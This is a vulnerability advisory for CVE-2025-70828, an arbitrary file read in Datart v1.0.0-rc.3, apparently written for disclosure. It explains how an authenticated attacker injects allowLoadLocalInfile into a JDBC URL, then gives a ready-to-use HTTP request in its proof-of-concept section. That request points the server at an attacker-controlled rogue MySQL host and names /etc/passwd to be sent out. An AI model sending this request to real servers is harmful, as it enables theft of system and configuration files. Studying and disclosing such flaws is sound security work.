# CVE-2025-70828

## Summary

An arbitrary file read vulnerability was discovered in Datart v1.0.0-rc.3. The application fails to properly validate the JDBC connection URL during data source configuration.

## Vulnerability Details

**Vulnerability Type:** Improper Input Validation (CWE-20) / Arbitrary File Read
**Affected Version:** Datart v1.0.0-rc.3
**Severity:** High (Potential for sensitive information disclosure)

## Description

The vulnerability exists in the data source configuration module. The application does not strictly sanitize the `url` parameter in the JDBC configuration. A remote attacker with privileges to configure data sources can inject malicious parameters (specifically `allowLoadLocalInfile=true`) into the JDBC URL.

By pointing the JDBC connection to a malicious MySQL server controlled by the attacker (Rogue MySQL Server), the attacker can trigger the client to send local files from the Datart server to the attacker's server.

## Impact

Successful exploitation allows an authenticated attacker to read arbitrary files from the server file system (e.g., `/etc/passwd`, configuration files, source code), potentially leading to server compromise or further attacks.

## Proof of Concept (PoC)

1. **Setup**: The attacker sets up a malicious MySQL server capable of exploiting the `LOAD DATA LOCAL INFILE` feature (e.g., using tools like `rogue_mysql_server`).
2. **Exploit**: The attacker sends the following request to the Datart server to test the connection:

```http
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
```
